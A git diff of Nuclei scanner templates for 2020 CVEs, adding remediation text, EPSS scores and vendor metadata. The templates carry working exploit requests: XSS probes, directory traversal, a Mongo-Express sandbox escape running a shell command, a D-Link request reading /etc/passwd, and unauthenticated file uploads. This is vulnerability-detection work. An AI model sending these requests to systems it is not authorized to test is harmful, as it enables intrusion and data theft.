a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. + remediation: | + To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html - https://nvd.nist.gov/vuln/detail/CVE-2020-23517 @@ -13,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-23517 cwe-id: CWE-79 - cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* epss-score: 0.00118 + epss-percentile: 0.45597 + cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: aryanic + product: high_cms shodan-query: title:"HighMail" fofa-query: title="HighMail" tags: cve,cve2020,xss,cms,highmail,aryanic @@ -29,20 +34,20 @@ http: - "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - 'value="">' - type: word + part: header words: - text/html - part: header - type: status status: - 200 -# Enhanced by mp on 2022/03/14 +# digest: 4a0a00473045022100da6cdafcd1d19bb280d0699d20f4860d4d3443c3ac469cc01c0ec6997df7bf1802205ea8a2cc38fa6192eb17a69397bdcc417e9f167764c5663022e2cb03eb1d143b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index 38ae370ec8..7e5fbb04b3 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server. + remediation: | + Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/48561 - https://nvd.nist.gov/vuln/detail/CVE-2020-23575 @@ -14,10 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23575 cwe-id: CWE-22 - epss-score: 0.02655 - tags: cve,cve2020,printer,iot,lfi,edb + epss-score: 0.01879 + epss-percentile: 0.87125 + cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kyocera + product: d-copia253mf_plus_firmware + tags: cve,cve2020,printer,iot,lfi,edb http: - method: GET @@ -37,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/04 +# digest: 4a0a00473045022100961b7d031bda3b3294765236974b62a39a903bca57dae4c5cf8b96627bd8b65502202186f21c9b684e2caaa21fe49657fc05908a3d9459bd5d441101c95f4aca324f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index 0aac2a5075..7021c992ee 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the page feature in admin/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/monstra-cms/monstra/issues/463 - https://nvd.nist.gov/vuln/detail/CVE-2020-23697 @@ -14,13 +16,15 @@ info: cvss-score: 5.4 cve-id: CVE-2020-23697 cwe-id: CWE-79 - cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* epss-score: 0.0009 + epss-percentile: 0.37861 + cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true + max-request: 4 + vendor: monstra + product: monstra_cms tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated - variables: string: "{{to_lower('{{randstr}}')}}" @@ -32,19 +36,16 @@ http: Content-Type: application/x-www-form-urlencoded login={{username}}&password={{password}}&login_submit=Log+In - - | GET /admin/index.php?id=pages&action=add_page HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | POST /admin/index.php?id=pages&action=add_page HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15 - - | GET /{{string}} HTTP/1.1 Host: {{Hostname}} @@ -61,10 +62,10 @@ http: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true + part: body -# Enhanced by md on 2023/02/01 +# digest: 4a0a00473045022100bb7d4bf5abcff23e33d153bc591f12425f9763a0f459c201396166961543375702204e77ddf422cdc5c9795e858210794acea03ad1817db35bea8acb049a0a98df3d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index f2f2c44c8f..5ff8a71d2b 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -7,6 +7,8 @@ info: description: | Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext. + remediation: | + Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49129 - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md @@ -17,11 +19,17 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23972 cwe-id: CWE-434 - cpe: cpe:2.3:a:gmapfp:gmapfp:*:*:*:*:*:*:*:* - epss-score: 0.66354 - tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive + epss-score: 0.61762 + epss-percentile: 0.97449 + cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* metadata: max-request: 2 + vendor: gmapfp + product: gmapfp + framework: joomla\! + tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive +variables: + name: "{{to_lower(rand_text_alpha(5))}}" http: - raw: @@ -38,7 +46,7 @@ http: com_gmapfp ------WebKitFormBoundarySHHbUsfCoxlX1bpS - Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif" + Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif" Content-Type: text/html projectdiscovery @@ -56,8 +64,8 @@ http: extractors: - type: regex - part: body regex: - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" + part: body -# Enhanced by mp on 2022/07/13 +# digest: 4a0a004730450221008c826fc1762191d0c8fee4f372e52b9b42e5d6ad184177e5b4bd4e2bc833341102205dd72065552482275a224896d24beeb5ec66ef9c659116a61b58328532b6d66a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index b43fd26464..ea76586a70 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action. + remediation: | + Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability. reference: - https://github.com/dwisiswant0/CVE-2020-24148 - https://wordpress.org/plugins/import-xml-feed/#developers @@ -15,16 +17,21 @@ info: cvss-score: 9.1 cve-id: CVE-2020-24148 cwe-id: CWE-918 - cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:*:*:* - epss-score: 0.06154 - tags: cve,cve2020,wordpress,wp-plugin,ssrf + epss-score: 0.08836 + epss-percentile: 0.93858 + cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: mooveagency + product: import_xml_and_rss_feeds + framework: wordpress + tags: cve,cve2020,wordpress,wp-plugin,ssrf http: - method: POST path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml" + body: "type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0" matchers: - type: word @@ -32,4 +39,4 @@ http: words: - "http" -# Enhanced by mp on 2022/03/27 +# digest: 4a0a004730450221009cf4a5c9ed4ee7973b04117273b8d232f2bc423215ca7f4378e7b25d8760821c022040b3a44b9e1fcd7758ac2fcccae6e5f9034a400e847d806a4ff2be002affd9e1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 939a08869b..0a18f5b926 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -5,6 +5,8 @@ info: author: Ganofins severity: critical description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server. + remediation: | + Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability. reference: - https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2020-24186 @@ -15,11 +17,15 @@ info: cvss-score: 10 cve-id: CVE-2020-24186 cwe-id: CWE-434 - cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:*:*:* - epss-score: 0.97485 - tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive + epss-score: 0.97438 + epss-percentile: 0.99929 + cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + vendor: gvectors + product: wpdiscuz + framework: wordpress + tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive http: - raw: @@ -27,7 +33,6 @@ http: GET /?p=1 HTTP/1.1 Host: {{Hostname}} Accept: */* - - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} @@ -60,34 +65,34 @@ http: 1 ------WebKitFormBoundary88AhjLimsDMHU1Ak-- - extractors: - - type: regex - part: body - internal: true - name: wmuSecurity - group: 1 - regex: - - 'wmuSecurity":"([a-z0-9]+)' - - - type: regex - part: body - group: 1 - regex: - - '"url":"([a-z:\\/0-9-.]+)"' - matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: body words: - 'success":true' - 'fullname' - 'shortname' - 'url' condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: wmuSecurity + group: 1 + regex: + - 'wmuSecurity":"([a-z0-9]+)' + internal: true part: body -# Enhanced by mp on 2022/04/19 + - type: regex + group: 1 + regex: + - '"url":"([a-z:\\/0-9-.]+)"' + part: body + +# digest: 4a0a0047304502203277feb2d48d234c58e63406cafcf232135caa142b1f42708a5c4ab99c54ab57022100c1a2c862e6234a866ee923a2573be36e7d3e4b7d5b7748eb262f887b0db6b0ea:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index a1b734b095..bce79d1eb3 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters. + remediation: | + Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/48777 - https://sourceforge.net/projects/maracms/ @@ -15,28 +17,34 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24223 cwe-id: CWE-79 - cpe: cpe:2.3:a:mara_cms_project:mara_cms:*:*:*:*:*:*:*:* - epss-score: 0.01034 - tags: cve,cve2020,mara,xss,edb + epss-score: 0.00976 + epss-percentile: 0.81713 + cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mara_cms_project + product: mara_cms + tags: cve,cve2020,mara,xss,edb http: - method: GET path: - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' + matchers-condition: and matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - '">' - part: body - - type: word - words: - - "text/html" - part: header -# Enhanced by mp on 2022/05/04 +# digest: 4a0a004730450221009db8a4aa3295dd88ff2e8f0e370deb2fc4641562f329a9352a9feb82cdb825d2022005b7efec557c478a4917ab749d1c997122630d564a080ef2ba2d00cf0522f1e0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 16ef6a2d62..5c21136021 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -6,6 +6,8 @@ info: severity: high description: | mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. + remediation: | + Update the WordPress Plugin File Manager (wp-file-manager) to the latest version to mitigate the backup disclosure vulnerability. reference: - https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ - https://nvd.nist.gov/vuln/detail/CVE-2020-24312 @@ -14,11 +16,15 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24312 cwe-id: CWE-552 - cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:*:*:* - epss-score: 0.02595 - tags: cve,cve2020,wordpress,backups,plugin + epss-score: 0.01622 + epss-percentile: 0.8609 + cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: webdesi9 + product: file_manager + framework: wordpress + tags: cve,cve2020,wordpress,backups,plugin http: - method: GET @@ -27,10 +33,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - 'Index of' @@ -38,4 +40,8 @@ http: - 'backup_' condition: and -# Enhanced by mp on 2022/04/08 + - type: status + status: + - 200 + +# digest: 490a00463044022032f8c3cdc5312bd8c0165e9e23fec964d9798f599345cf2f9a75f8309dc52363022038a67ebe1237b886b94efc5d476d06d63c003324b08912cb2e48699bbd75ca40:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index e56e014332..4dc7c51020 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -5,6 +5,8 @@ info: author: leovalcante severity: critical description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/ - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a @@ -14,31 +16,34 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-24391 - cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:* - epss-score: 0.49283 - tags: cve,cve2020,mongo,express,rce,intrusive + epss-score: 0.47848 + epss-percentile: 0.9709 + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 3 + vendor: mongo-express_project + product: mongo-express + framework: node.js + tags: cve,cve2020,mongo,express,rce,intrusive http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /checkValid HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++ - - | GET /public/css/{{randstr}}.css HTTP/1.1 Host: {{Hostname}} - req-condition: true cookie-reuse: true + req-condition: true + matchers-condition: and matchers: - type: regex @@ -55,4 +60,4 @@ http: regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# Enhanced by mp on 2022/03/27 +# digest: 490a0046304402205545b47b484aa65aec5651133f4207c56f4ecf8b058d503090b8ceee0b5b84c202204f7b7b511e05ed7e95ff7671e9398432b576ebf95f4e0a4d1d6b866676814dcd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 5fb8b3a5c7..b364585aab 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to EpiServer Find version 13.2.7 or later to fix the open redirect vulnerability. reference: - https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/ - https://nvd.nist.gov/vuln/detail/CVE-2020-24550 @@ -13,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24550 cwe-id: CWE-601 - cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* epss-score: 0.00157 - tags: cve,cve2020,redirect,episerver + epss-percentile: 0.52018 + cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: episerver + product: find + tags: cve,cve2020,redirect,episerver http: - method: GET @@ -35,4 +40,4 @@ http: status: - 301 -# Enhanced by md on 2022/10/13 +# digest: 4a0a00473045022037b984b537b3c1d3c8e89924c81ab3b4069ac277ef9b62dfbd17b4b138674449022100bf7d6ebfa9dbad0590e03352f76d669bfc91381d8303faa13317750a601ae490:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 3b84463af9..0333872420 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion. + remediation: | + Upgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability. reference: - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 - https://nvd.nist.gov/vuln/detail/CVE-2020-24571 @@ -13,11 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24571 cwe-id: CWE-22 + epss-score: 0.02513 + epss-percentile: 0.88941 cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:* - epss-score: 0.03491 - tags: cve,cve2020,nexusdb,lfi metadata: max-request: 1 + vendor: nexusdb + product: nexusdb + tags: cve,cve2020,nexusdb,lfi http: - method: GET @@ -27,12 +32,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "[extensions]" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/07/13 +# digest: 4a0a00473045022100f0e0dd567b262be7acdb3d4f65e5474065e4407a6d1f4d302ba7ae8820dbc4b302206cb0082989a2ea0b27d1d84b0fa23338ec1176881cb23296299edd3f98f4e809:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 59e567cfe4..a0258f5c7f 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. + remediation: | + Apply the latest firmware update provided by D-Link to fix the vulnerability. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/ @@ -14,10 +16,14 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24579 cwe-id: CWE-287 - epss-score: 0.00215 - tags: cve,cve2020,dlink,rce + epss-score: 0.00734 + epss-percentile: 0.78703 + cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: dlink + product: dsl2888a_firmware + tags: cve,cve2020,dlink,rce http: - raw: @@ -27,7 +33,6 @@ http: Cookie: uid=6gPjT2ipmNz username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b - - | # Get /etc/passwd GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} @@ -35,14 +40,14 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "nobody:[x*]:65534:65534" - "root:.*:0:0:" condition: or -# Enhanced by mp on 2022/07/13 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100ff6ffdbbee5d51935b37f9efd8500e568ade79321a916751f96d7b587c811a4a02210084a71ee038b3b7de0ef504e8f8c4be2b4c6d607a8d2a99c1d5ab0c3ccf835d59:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 960e573379..a28e17ee65 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -5,6 +5,8 @@ info: author: lethargynavigator severity: critical description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. + remediation: | + Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch. reference: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 - https://nvd.nist.gov/vuln/detail/CVE-2020-24589 @@ -12,10 +14,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2020-24589 - epss-score: 0.48841 - tags: cve,cve2020,wso2,xxe,oast,blind + cwe-id: CWE-611 + epss-score: 0.55133 + epss-percentile: 0.97265 + cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 + product: api_manager + tags: cve,cve2020,wso2,xxe,oast,blind http: - raw: @@ -38,4 +45,4 @@ http: words: - "Failed to install the generic artifact type" -# Enhanced by mp on 2022/04/14 +# digest: 4a0a00473045022100abb97eb682da98c8578da0c5d8379640b5293c1ea44057c11ee05b9bb50e6520022042503ebcda1d3800be3c3a5e8bfd490ab7b0e033fbbab24dbda73fb41b8588a9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index 0847034ee1..057d7b3317 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of Quixplorer (>=2.4.2) or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt - https://nvd.nist.gov/vuln/detail/CVE-2020-24902 @@ -14,13 +16,16 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24902 cwe-id: CWE-79 + epss-score: 0.00191 + epss-percentile: 0.56404 cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* - epss-score: 0.00171 metadata: - max-request: 1 - google-query: intitle:"My Download Server" - shodan-query: http.title:"My Download Server" verified: true + max-request: 1 + vendor: quixplorer_project + product: quixplorer + shodan-query: http.title:"My Download Server" + google-query: intitle:"My Download Server" tags: cve,cve2020,quixplorer,xss http: @@ -30,6 +35,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -48,4 +54,4 @@ http: status: - 200 -# Enhanced by md on 2022/12/08 +# digest: 4a0a0047304502204ffe5aef8e8db7b959b28463734c1b59721b31bfbda0ef47183c3af721e7459d02210080d031a563bcbb3f5e0fd2d60c3a63adcbf0a9236d3d3844dcd11c2277ba5f73:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index ebfd9c4e73..2f4d610daf 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks. reference: - https://seclists.org/bugtraq/2016/Mar/104 - https://nvd.nist.gov/vuln/detail/CVE-2020-24903 @@ -14,12 +16,16 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24903 cwe-id: CWE-79 - cpe: cpe:2.3:a:cutesoft:cute_editor:*:*:*:*:*:*:*:* - epss-score: 0.00246 + epss-score: 0.00262 + epss-percentile: 0.6368 + cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: - max-request: 1 - shodan-query: http.component:"ASP.NET" verified: true + max-request: 1 + vendor: cutesoft + product: cute_editor + framework: asp.net + shodan-query: http.component:"ASP.NET" tags: cve,cve2020,cuteeditor,xss,seclists http: @@ -45,4 +51,4 @@ http: status: - 200 -# Enhanced by md on 2022/12/08 +# digest: 490a0046304402202d20b9a307330117b276e69a434c0370c79add2cedeb00a74cb4f3e5242042f40220675abe7db537c6598e99d2944fc8cdecac2d7fd8786321ce5bee40a59e75fe3d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index c424e27dbc..3417e6eef2 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -5,21 +5,27 @@ info: author: pikpikcu severity: medium description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://github.com/qcubed/qcubed/pull/1320/files - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - http://seclists.org/fulldisclosure/2021/Mar/30 + - http://qcubed.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-24912 cwe-id: CWE-79 + epss-score: 0.00183 + epss-percentile: 0.55429 cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* - epss-score: 0.00187 - tags: cve,cve2020,qcubed,xss,seclists metadata: max-request: 3 + vendor: qcubed + product: qcubed + tags: cve,cve2020,qcubed,xss,seclists http: - method: POST @@ -27,21 +33,22 @@ http: - "{{BaseURL}}/assets/_core/php/profile.php" - "{{BaseURL}}/assets/php/profile.php" - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php" + + body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + headers: Content-Type: application/x-www-form-urlencoded - body: 